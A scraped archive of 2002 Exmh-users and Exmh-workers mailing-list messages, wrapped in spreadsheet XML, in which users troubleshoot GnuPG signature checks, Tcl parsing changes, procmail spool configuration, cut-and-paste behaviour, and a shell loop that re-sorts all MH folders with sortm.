 &gt; file 
 &gt; first to see what sequences were in it and then once per sequence.  This
 &gt; 
 &gt; happens anywhere that we look at sequences, most notably in
 &gt; Ftoc_ShowSequences.
 &gt; That seemed to be an obvious lose performancewise, but I wanted my
 &gt; abstraction to 
 &gt; have a separate call for "what sequences are in this folder?" and "what 
 &gt; messages are in this sequence?".  One option would have been to add
 &gt; another 
 &gt; call to get the data off of disk, but I felt that the
 &gt; check-the-modify-time 
 &gt; technique would be less error-prone.I like the check-the-modify-time technique. &gt; I think the biggest gains would be from augmenting Ftoc_ShowSequences to
 &gt; allow 
 &gt; a finer specification of what needs to be updated in the ftoc so that
 &gt; the 
 &gt; current code would only be run when we really do have to update all
 &gt; sequences 
 &gt; for all messages.  I described these thoughts in an email message
 &gt; yesterday.
 &gt; 
 &gt; And again, if it can wait a few weeks, I'm willing to do it.OK - I've yet to dive into the latest round of changes, but I plan to.
I can say I'll make any progress, but I may dabble.  Thanks again for
all your work in this area.  Generalized sequence support has been on
my to do list for about 8 years.--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</si>
  <si>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message.Its as if it cant find gpg to execute it (but I fixed that path), so there
must be something else that I am missing...
-- 
                                        Reg.Clemens
                                        reg@dwf.com
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>Hi,On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
[...]
&gt; in messages with GnuPG signatures.  But punching the line ALWAYS
&gt; gives
&gt; 
&gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDDF997A
&gt;         Can't check signature: public key not found
&gt; 
&gt; So, something else is missing.Yes, the public key of the signature you want to check :-).Are you really sure that you have the public key of the message's
signature? If not, try downloading it or try to check a signature from
which you know you have the public key.Regards,Ingo-- 
Ingo Frommholz                             PGP public keys on homepage
ingo@frommholz.org                           http://www.frommholz.org/
My childhood inspection is my record collection (Ned's Atomic Dustbin)
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>If you haven't already, you should enable the debug log under
Hacking Support preferences and look for clues there.&gt;&gt;&gt;Reg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t>
  </si>
  <si>
    <t>2 things - first, the switch parser changed in a subtle way with 8.4 -
byte-code compilation was added, and it is slightly more strict in
its parsing than the original parser.  You can only have a comment where
Tcl would expect to find a command.  Switch has a "pattern - body"
strucutre, so if you goof and put a comment where it is trying to find
a pattern, both of you will be confused with the results.  The
subtlty arises with extra whitespace and newlines. I can't give you
the exact case, but I know exmh had one example that stopped parsing
correctly, and was arguably wrong before.2nd - I've managed to remain fairly ignoranat of the PGP support in
exmh, so you'll have to dig in yourself or see if someone else on
exmh-users or exmh-workers is having similar problems.&gt;&gt;&gt;Reg Clemens said:
 &gt; &gt; If you haven't already, you should enable the debug log under
 &gt; &gt; Hacking Support preferences and look for clues there.
 &gt; &gt; 
 &gt; &gt; &gt;&gt;&gt;Reg Clemens said:
 &gt; &gt;  &gt; &gt; Hi,
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; &gt; On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
 &gt; &gt;  &gt; &gt;   
 &gt; &gt;  &gt; &gt; [...]
 &gt; &gt;  &gt; &gt; &gt; in messages with GnuPG signatures.  But punching the line ALWAYS
 &gt; &gt;  &gt; &gt; &gt; gives
 &gt; &gt;  &gt; &gt; &gt; 
 &gt; &gt;  &gt; &gt; &gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key I
     D BDD
 &gt; &gt;      F997A
 &gt; &gt;  &gt; &gt; &gt;         Can't check signature: public key not found
 &gt; &gt;  &gt; &gt; &gt; 
 &gt; &gt;  &gt; &gt; &gt; So, something else is missing.
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; &gt; Yes, the public key of the signature you want to check :-).
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; &gt; Are you really sure that you have the public key of the message's
 &gt; &gt;  &gt; &gt; signature? If not, try downloading it or try to check a signature fro
     m
 &gt; &gt;  &gt; &gt; which you know you have the public key.
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; &gt; 
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; Ah, sorry for not making that clearer.
 &gt; &gt;  &gt; But no.
 &gt; &gt;  &gt; Previously (v1.0.6 of GnuPG) there would be a slight pause at this poin
     t whi
 &gt; &gt;      le
 &gt; &gt;  &gt; it went out to get the public key from a keyserver.
 &gt; &gt;  &gt; Now, whether I have the key or NOT, I get the failure message.
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; Its as if it cant find gpg to execute it (but I fixed that path), so th
     ere
 &gt; &gt;  &gt; must be something else that I am missing...
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; -- 
 &gt; &gt;  &gt;                                         Reg.Clemens
 &gt; &gt;  &gt;                                         reg@dwf.com
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; 
 &gt; &gt;  &gt; _______________________________________________
 &gt; &gt;  &gt; Exmh-users mailing list
 &gt; &gt;  &gt; Exmh-users@redhat.com
 &gt; &gt;  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users
 &gt; &gt; 
 &gt; &gt; --
 &gt; &gt; Brent Welch
 &gt; &gt; Software Architect, Panasas Inc
 &gt; &gt; Pioneering the World's Most Scalable and Agile Storage Network
 &gt; &gt; www.panasas.com
 &gt; &gt; welch@panasas.com
 &gt; &gt; 
 &gt; 
 &gt; 
 &gt; Partial solution.
 &gt; And this MAY be related to using tcl/tk 8.4b1, as I had a similar
 &gt; problem about a month ago elsewhere in EXMH (which you found).
 &gt; 
 &gt; But first.
 &gt; I really feel like something has changed out from under me
 &gt; with my making no changes to EXMH.  Namely, when I first got
 &gt; GPG up and working (for reading signatures) all I did was
 &gt; touch the 'Check Signature' button' and it went out and queried
 &gt; the keyserver for me.
 &gt; Now Im getting a separate box, after the failure to find the
 &gt; public key on my keyring, asking me of I want to 'Query keyserver'
 &gt; 
 &gt; I KNOW that I never had to touch a 'Query keyserver' button in
 &gt; the past, but there it is now, and I havent touched EXMH. Spooky.
 &gt; 
 &gt; I have been working back and forth between GPG 1.0.6 and 1.0.7
 &gt; but its not clear how that could be the problem, as Im now getting
 &gt; the 'Query' message when running either...
 &gt; 
 &gt; ---
 &gt; 
 &gt; OK, enough about my confusion.
 &gt; The CURRENT problem seems to be a COMMENT in a SWITCH statement
 &gt; at line 86 in pgpWWW.tcl.  Tcl 8.4b1 doesnt like it and I get your
 &gt; popup box.  Remove it and no popupbox, but EXMH hangs (sigh).
 &gt; So, not a complete solution, but at least a start.
 &gt; 
 &gt; Thanks for the interest.
 &gt; 
 &gt; 					Reg.Clemens
 &gt; 					reg@dwf.com--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t xml:space="preserve">I use exmh 2.5 with procmail for presorting incoming mail and move it to
the relevant folder using rcvstore.Recently, my incoming mail (or spool) location moved to another disk.
I'm not quite clear how to reconfigure procmail/rcvstore/exmh to accept
mail from the new location.There seems to be a variable in exmh-defaults (bgspool). It says at the
top of the file not to edit these lines. So, I went ahead and edited it :-)
That does not make a difference.It seems like procmail is the one that is actually reading the mail from
my spool/incoming mail area and piping it to rcvstore. So, I need to
configure that probably.Any idea how I would do this?Thanks
Siva_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to do a global Sort command? Here's the situation: I like to 
sort by date every folder. I'm cleaning up my inbox from most recent to oldest, 
since I find this direction most efficient (I guess because it helps me 
recognize the significance of individual, old messages). But this adds messages 
to my other folders in the wrong order. When I'm done, I'd like to re-sort all 
the folders I've changed.--
rick_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Mon, 09 Sep 2002 12:05:55 PDT,
	Rick Baartman  wrote:&gt; Is there a way to do a global Sort command? Here's the situation:
&gt; I like to sort by date every folder. I'm cleaning up my inbox from
&gt; most recent to oldest, since I find this direction most efficient (I
&gt; guess because it helps me recognize the significance of individual,
&gt; old messages). But this adds messages to my other folders in the
&gt; wrong order. When I'm done, I'd like to re-sort all the folders I've
&gt; changed.I don't understand.  How does sorting one folder add messages to
other folders?  What do you use to sort?Tom_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I don't understand.  How does sorting one folder add messages to
&gt; other folders?  What do you use to sort?
&gt; Sorry I wasn't clear. I am transferring messages from my inbox to other folders 
and since I am doing it from most recent to oldest, they appear in those 
folders in the wrong order and need re-sorting.--
rick_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Mon, 09 Sep 2002 12:21:42 PDT,
	Rick Baartman  wrote:&gt; Sorry I wasn't clear. I am transferring messages from my inbox to
&gt; other folders and since I am doing it from most recent to oldest, they
&gt; appear in those folders in the wrong order and need re-sorting.OK, gotcha.I don't think you can do that with exmh, but you can do it on the
command line, if you use sh or ksh:	for f in `folders -fast -r`
	do
		echo sorting $f ...
		sortm +$f
	doneIt could take a long time.At work, I have to use Outlook.  Ick.  I hate it.  But it does a few
things right.  Like making indices for each folder, and not just by
date, but also by sender, message size, subject.  So I can sort by any
column instantly.I believe this is possible, too, with an IMAP compliant reader,
provided the IMAP server makes such indices.I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I've been
using MH or nmh since 1985 and exmh since 1995.  17 years is a long
time!_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Rick Baartman wrote:
&gt; Is there a way to do a global Sort command?
Wanting to sort like that is not common; I'd be surprised if exmh has
a widget for it.  You can achieve what you want with the command-line
mh tools, though.
I suggest doing the following from a shell prompt: sh -c 'for f in "`folders -recurse -fast`" ; do sortm +"$f" ; done'(The command "sortm" will sort a particular folder, and
"folders -recurse -fast" prints out a list of all of your folders.)
I hope this helps,
 Jacob Morzinski                                jmorzins@mit.edu_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I am facing the fact that exmh has been left behind in some industry
&gt; standards.  I use it for my personal mail.  My mail server runs unix,
&gt; and I connect over ssh and tunnel my X traffic over ssh.  With a slow
&gt; link, this makes exmh very slow.  And mime handling is pretty bad
&gt; compared with modern mailers.These are some good comments and I'd like to share an opinion here.  (Is that permitted? :)I started using linux about 8 or 9 years ago in rebellion against what the university was doing with Winder$.  I just couldn't get good support and was using a lot of unix-based tools (ported to Winder$) anyway. So, I jumped ship and became my own sysadm.What I got was the easy ability to use a shell (now ssh) to connect to my office box from just about anywhere and use either exmh or nmh (from the command line).  I can do email for the office fairly easily.I haven't seen any other tools that let me do that yet.  But, I have to admit, that some of the web-based mail software is getting pretty close.  Quoting and such is still primitive, but they're moving forward.-=d_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>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done'I'd attach this command to the sorting menu if I knew any tcl...--
rick_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; On Mon, 9 Sep 2002, Rick Baartman wrote:
&gt; Thanks Tom and Jacob. The above works, but without the double quotes: i.e. 
&gt; 
&gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
&gt; 
But there is a problem with making changes outside of exmh: the .xmhcache files 
don't get updated. This is dangerous; I have to remember to re-scan each folder 
I enter. Is there a safeguard for this?--
rick
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;  sh -c 'for f in "`folders -recurse -fast`" ; do sortm +"$f" ; done'&gt; Thanks Tom and Jacob. The above works, but without the double quotes: i.e.
&gt;
&gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'I may have a different version of "sh" than you do; the double quotes
around the backticks work for my "sh".(In the more-than-you-really-wanted-to-know category, you're probably
safe without the double quotes.  The only reason I put them in is that
I have some pathologically-named folders, including folders whose
names contain spaces.  If all your folders have safe names, you don't
need special quoting.)
 -Jacob_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Mon, 9 Sep 2002, "Rick" == Rick Baartman wrote:  Rick&gt; This is dangerous; I have to remember to re-scan each
  Rick&gt; folder I enter. Is there a safeguard for this?Nope.  Regenerate the cache in the script	for f in `folders -fast -r`
	do
		echo sorting $f ...
		sortm +$f
		scan `mhpath +`/$f/.xmhcache
	done--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Done&gt;&gt;&gt;Robert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</si>
  <si>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On Mon, 09 Sep 2002 15:36:37 -0400 
Tom Reingold  wrote:&gt; At work, I have to use Outlook.  Ick.  I hate it.  Ahh.  At work we fire people who use Outlook (Literally true: They get
escorted to the door, their badge confiscated, and told to return the
next day to collect their office contents).&gt; But it does a few things right.  Like making indices for each folder,
&gt; and not just by date, but also by sender, message size, subject.  So I
&gt; can sort by any column instantly.Have you looked into using a custom sequences file?&gt; And mime handling is pretty bad compared with modern mailers.The only thing I actually miss in that regard is support for S/MIME.--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</si>
  <si>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
On Tue, 10 Sep 2002 01:20:56 PDT,
	J C Lawrence  wrote:&gt; On Mon, 09 Sep 2002 15:36:37 -0400 
&gt; Tom Reingold  wrote:
&gt; 
&gt; &gt; At work, I have to use Outlook.  Ick.  I hate it.  
&gt; 
&gt; Ahh.  At work we fire people who use Outlook (Literally true: They get
&gt; escorted to the door, their badge confiscated, and told to return the
&gt; next day to collect their office contents).Why?  What threat does Outlook pose to your organization?&gt; &gt; But it does a few things right.  Like making indices for each folder,
&gt; &gt; and not just by date, but also by sender, message size, subject.  So I
&gt; &gt; can sort by any column instantly.
&gt; 
&gt; Have you looked into using a custom sequences file?More detail please?  I do use sequences, so I'm familiar with their
use, but how can I make indices with them, and how can I keep them
up to date?&gt; &gt; And mime handling is pretty bad compared with modern mailers.
&gt; 
&gt; The only thing I actually miss in that regard is support for S/MIME.You're probably running exmh on a local machine.  I'm running it on
a very remote machine.  In this scenario, the mime handling is weak._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Tom Reingold wrote:&gt; &gt; 
&gt; &gt; Ahh.  At work we fire people who use Outlook (Literally true:
&gt; &gt; They get escorted to the door, their badge confiscated, and
&gt; &gt; told to return the next day to collect their office contents).
&gt; 
&gt; Why?  What threat does Outlook pose to your organization?
&gt; It has been described as "the technological equivalent of
soliciting blood transfusions from random strangers in the
street".  In short - it's a virus magnet._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 10 Sep 2002 10:29:26 -0400 
Tom Reingold  wrote:
&gt; On Tue, 10 Sep 2002 01:20:56 PDT, J C Lawrence  wrote:&gt;&gt; Ahh.  At work we fire people who use Outlook (Literally true: They
&gt;&gt; get escorted to the door, their badge confiscated, and told to return
&gt;&gt; the next day to collect their office contents).&gt; Why?  What threat does Outlook pose to your organization?It places the company, corporate network and data at risk.Outlook is subject to an (absurdly large) number of exploits with more
being regularly found.  An exploited system, to whatever extent, places
other corporate systems at risk, customer systems at risk, company
reputation and liability with customers at risk, and
proprietary/corporate data at risk.  Further, users cannot be reliably
expected to use Outlook in a safe manner.  The net result is that
Outlook use is considered to be somewhere between criminal negligence
and deliberately malicious as far as the employer is concerned.&gt;&gt; Have you looked into using a custom sequences file?&gt; More detail please?  I do use sequences, so I'm familiar with their
&gt; use, but how can I make indices with them, and how can I keep them up
&gt; to date?I don't use custom sequences, so I can't comment well.  I suspect that
you'd have to use a cron job to maintain the sequences.&gt;&gt; The only thing I actually miss in that regard is support for S/MIME.&gt; You're probably running exmh on a local machine.  I'm running it on a
&gt; very remote machine.  In this scenario, the mime handling is weak.Nope.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</si>
  <si>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
On Tue, 10 Sep 2002 15:43:32 BST,
	James Gibbon  wrote:&gt; 
&gt; Tom Reingold wrote:
&gt;
&gt; &gt; Why?  What threat does Outlook pose to your organization?
&gt; &gt; 
&gt; 
&gt; It has been described as "the technological equivalent of
&gt; soliciting blood transfusions from random strangers in the
&gt; street".  In short - it's a virus magnet.Oh, that.  Well, you're right.
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; You're probably running exmh on a local machine.  I'm running it on a
&gt; &gt; very remote machine.  In this scenario, the mime handling is weak.
&gt; 
&gt; Nope.  I run exmh on my desktops at home and at work with the resulting
&gt; exmh windows being displayed on both my work and home desktops (gratis
&gt; SSH X11 forwarding).I run exmh routinely from home (broadband) using an XWindows Client tunneled through ssh under  WinXP.  It works very well in this fashion.FWIW, I use Eudora under Winder$ because it's less of a virus magnet.  :)There's more to the story why I run Winder$, but that's really off-topic and I'm already guilty!-=d_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">There is an "Update all scan caches" menu entry that rescans your
folders similar to the short scripts folks have shared around.  It
runs in the background.&gt;&gt;&gt;Rick Baartman said:
 &gt; &gt; &gt; On Mon, 9 Sep 2002, Rick Baartman wrote:
 &gt; &gt; Thanks Tom and Jacob. The above works, but without the double quotes: 
i.e.
 &gt; &gt; 
 &gt; &gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
 &gt; &gt; 
 &gt; But there is a problem with making changes outside of exmh: the 
.xmhcache fi
     les 
 &gt; don't get updated. This is dangerous; I have to remember to re-scan each 
fol
     der 
 &gt; I enter. Is there a safeguard for this?
 &gt; 
 &gt; --
 &gt; rick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</si>
  <si>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first.Best would be to have a button for "Global sort and update all scan caches"
in the exmh More... menu--
rick&gt;&gt;&gt;&gt;&gt; "Brent" == Brent Welch 
&gt;&gt;&gt;&gt;&gt; wrote the following on Tue, 10 Sep 2002 14:31:48 -0700  Brent&gt; There is an "Update all scan caches" menu entry that rescans your
  Brent&gt; folders similar to the short scripts folks have shared around.  It
  Brent&gt; runs in the background._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002 01:24:46 +0200 
Robert Waldner  wrote:
&gt; On Tue, 10 Sep 2002 09:27:12 PDT, J C Lawrence writes:&gt;&gt;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machine.&gt; So you have 4 copies (1+1 per desktop) of exmh running?Yes.One of the nicer aspects of exmh's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I've not checked where it
gets that colour selection from).&gt; That's what I usually do, but what I'd really like would be some
&gt; automagism to tell them "Flist", "Rescan Folder", which I now do
&gt; manually whenever I'm going to work at the "other" machine.--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</si>
  <si>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appliance.That gives me access to both home and work email from either 
place without the complications involved in having two copies of 
exmh working on the same set of folders.It's a tad slow viewing work email when I'm at work ... but not 
so bad that I can't stand it.--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hmm - I'm cc'ing the exmh-workers list, because I really don't know
much about the various PGP interfaces.  I think there has been some
talk about "issues" with the latest version of gpg.&gt;&gt;&gt;Hacksaw said:
 &gt; version 2.5 08/15/2002
 &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 
17:09:31
 &gt; EDT 2001 i686 unknown
 &gt; Tk 8.3 Tcl 8.3
 &gt; 
 &gt; It's not clear to me this is a bug with exmh per se, but it's something 
that
 &gt; manifests through exmh, so I figured asking you might help me track it 
down.
 &gt; 
 &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, 
it
 &gt; first tries to ask me via the tty under which exmh is running. It tells 
me m
     y 
 &gt; passphrase is incorrect every time, at which point exmh offers me the 
line i
     n 
 &gt; the message about decrypting. I click the line and it offers me the 
dialog
 &gt; box, and tells me the passphrase is correct, and shows me the decrypted 
 &gt; message.
 &gt; 
 &gt; Any ideas on that?
 &gt; -- 
 &gt; Honour necessity.
 &gt; http://www.hacksaw.org -- http://www.privatecircus.com -- KB1FVD--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
The way to debug something like this is to turn on the log (Preferences 
-&gt; Hacking Support -&gt; Debug log enabled) and track the gpg commands 
being issued and the responses.FWIW, using exmh 2.5 and gpg 1.0.7 I do not have problems sending 
encrypted messages to myself. When I select the message, an xterm 
window pops up asking for the passphrase. I don't recall exmh ever 
asking me for the passphrase from the tty that started exmh nor from a 
dialog box. (But then again, I'm not a heavy gpg user).KevinIn message &lt;200209111917.PAA02912@blackcomb.panasas.com&gt;, Brent Welch writes:
&gt; Hmm - I'm cc'ing the exmh-workers list, because I really don't know
&gt; much about the various PGP interfaces.  I think there has been some
&gt; talk about "issues" with the latest version of gpg.
&gt; 
&gt; &gt;&gt;&gt;Hacksaw said:
&gt;  &gt; version 2.5 08/15/2002
&gt;  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31
&gt;  &gt; EDT 2001 i686 unknown
&gt;  &gt; Tk 8.3 Tcl 8.3
&gt;  &gt; 
&gt;  &gt; It's not clear to me this is a bug with exmh per se, but it's something 
&gt;  &gt; that manifests through exmh, so I figured asking you might help me track
&gt;  &gt; it down.
&gt;  &gt; 
&gt;  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, 
&gt;  &gt; it first tries to ask me via the tty under which exmh is running. It 
&gt;  &gt; tells me my passphrase is incorrect every time, at which point exmh 
&gt;  &gt; offers me the line in the message about decrypting. I click the line 
&gt;  &gt; and it offers me the dialog box, and tells me the passphrase is correct,
&gt;  &gt; and shows me the decrypted message.
&gt;  &gt; 
&gt;  &gt; Any ideas on that?_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Gotta wonder what the GPG config stuff in ~/.exmh/exmh-defaults looks 
like.  Also gotta wonder what the message headers in the offending 
message are saying to nmh/exmh.  My set-up works perfectly.  That is, 
I get a pop-up window to enter my passphrase into, and when I type it 
correctly, the message display changes from a prompt to click to 
decrypt to the message content.TTFN....On 11 September 2002 at 12:17, Brent Welch  wrote:Hmm - I'm cc'ing the exmh-workers list, because I really don't know
much about the various PGP interfaces.  I think there has been some
talk about "issues" with the latest version of gpg.&gt;&gt;&gt;Hacksaw said:
 &gt; version 2.5 08/15/2002
 &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31
 &gt; EDT 2001 i686 unknown
 &gt; Tk 8.3 Tcl 8.3
 &gt; 
 &gt; It's not clear to me this is a bug with exmh per se, but it's
 &gt; something that manifests through exmh, so I figured asking you
 &gt; might help me track it down.
 &gt;
 &gt; When I receive a gpg encrypted message, and it asks me for a
 &gt; passphrase, it first tries to ask me via the tty under which
 &gt; exmh is running. It tells me my passphrase is incorrect every
 &gt; time, at which point exmh offers me the line in the message
 &gt; about decrypting. I click the line and it offers me the dialog
 &gt; box, and tells me the passphrase is correct, and shows me the
 &gt; decrypted message.
 &gt; 
 &gt; Any ideas on that?
 &gt; -- 
 &gt; Honour necessity.
 &gt; http://www.hacksaw.org -- http://www.privatecircus.com -- KB1FVD_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Here's a message that works fine for me:X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: kevinc@doink.com
Subject: gpg test
Mime-Version: 1.0
Content-Type: text/x-pgp; format=mime; x-action=encrypt;
	x-recipients="D165C0CC, D165C0CC"
Content-Transfer-Encoding: 7bit
Date: Wed, 11 Sep 2002 13:18:58 -0700
From: Kevin Cosgrove 
Message-Id: &lt;20020911201900.492892FEAB@joseph.doink.com&gt;-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.0.7 (GNU/Linux)
Comment: Exmh version 2.5 10/15/1999blah, blah, blah-----END PGP MESSAGE-----It could be that your content type of text/plain is messing you up.
Your config stuff looks substantially the same as mine.Cheers....On 11 September 2002 at 16:11, Hacksaw  wrote:You may assume the X's were originally a valid address.X-em-version: 5, 0, 0, 4
X-em-registration: #01E0520310450300B900
X-priority: 3
X-mailer: My Own Email v4.00
Mime-version: 1.0
Content-type: text/plain; charset=US-ASCII
Subject: Discussion
From: "XXXXXXX"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zip_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then
attempt to inject it into the exmh input windows for comp/repl, the 'point'
is often an apparently random place in the text pane, not where I think I
have current flashing cursor. I usually wipe out any of To:/Subject:/ with the text. Its
often not even beginning of line denoted, ie its an unexplicable number
of char spaces in to the text where it inserts, What am I doing wrong in either X, WM, shell, EXMH which is causing this?cheers
	-George_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">exmh has a funky cut/paste model that is essentially all my fault.
The middle click sets the insert point.  If you hate that, go to the
Bindings... Simple Edit preferences window and de-select
"Paste Sets Insert".  &gt;&gt;&gt;George Michaelson said:
 &gt; 
 &gt; I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then
 &gt; attempt to inject it into the exmh input windows for comp/repl, the 
'point'
 &gt; is often an apparently random place in the text pane, not where I think I
 &gt; have current flashing cursor. 
 &gt; 
 &gt; I usually wipe out any of To:/Subject:/ with the text. Its
 &gt; often not even beginning of line denoted, ie its an unexplicable number
 &gt; of char spaces in to the text where it inserts, 
 &gt; 
 &gt; What am I doing wrong in either X, WM, shell, EXMH which is causing this?--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</si>
  <si>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    Date:        Wed, 11 Sep 2002 20:15:00 -0700
    From:        Brent Welch 
    Message-ID:  &lt;200209120315.XAA25189@blackcomb.panasas.com&gt;  | exmh has a funky cut/paste model that is essentially all my fault.
  | The middle click sets the insert point.  If you hate that, go to the
  | Bindings... Simple Edit preferences window and de-select
  | "Paste Sets Insert".  Unfortunately, the side effect of that solution is that it is no longer
possible to cut/paste within one sedit window, some intermediate client
always must be used (except in the rare case where you want to select
some text, and then paste it at the same place).That's because the click that you have to (with this option) make to set
the insert point, also kills the selection (it ends up reverting to the
last selection made in some other window, or something like that).So, the vast majority of people probably want that "Paste Sets Insert"
enabled - that one you can learn to live with, the other is much more
painful.kre_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 02:03, Robert Elz wrote:&gt;     Date:        Wed, 11 Sep 2002 20:15:00 -0700
&gt;     From:        Brent Welch &gt;   | exmh has a funky cut/paste model that is essentially all my fault.
&gt;   | The middle click sets the insert point.  If you hate that, go to the
&gt;   | Bindings... Simple Edit preferences window and de-select
&gt;   | "Paste Sets Insert".
&gt; 
&gt; Unfortunately, the side effect of that solution is that it is no longer
&gt; possible to cut/paste within one sedit window, some intermediate client
&gt; always must be used (except in the rare case where you want to select
&gt; some text, and then paste it at the same place).&gt; So, the vast majority of people probably want that "Paste Sets Insert"
&gt; enabled - that one you can learn to live with, the other is much more
&gt; painful.For a long time I have used an external editor with exmh (gvim).I can cut'n'paste from exmh's message display window into spawned
gvim processes, but not into anything else.This is VERY annoying.  (I have to look at the message with cat or less or whatever in a
  terminal window if I want to do this - which is quite often.  And
  if the message is q-p encoded or a non-text/plain mime type, I end
  up with all that raw garbage too).Anyway to fix this?(BTW: standard i386 redhat7.3)Thanks.&gt; kreCheers
Tony_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue Sep 10 2002 at 12:52, Robert Elz wrote:&gt; Subject: Patch to complete a change...&gt; I guess that most of us don't use "link" very often ... I noticed it
&gt; last week, but only got time to look and see why today.I would like to use [Link] a lot more, but is it rather
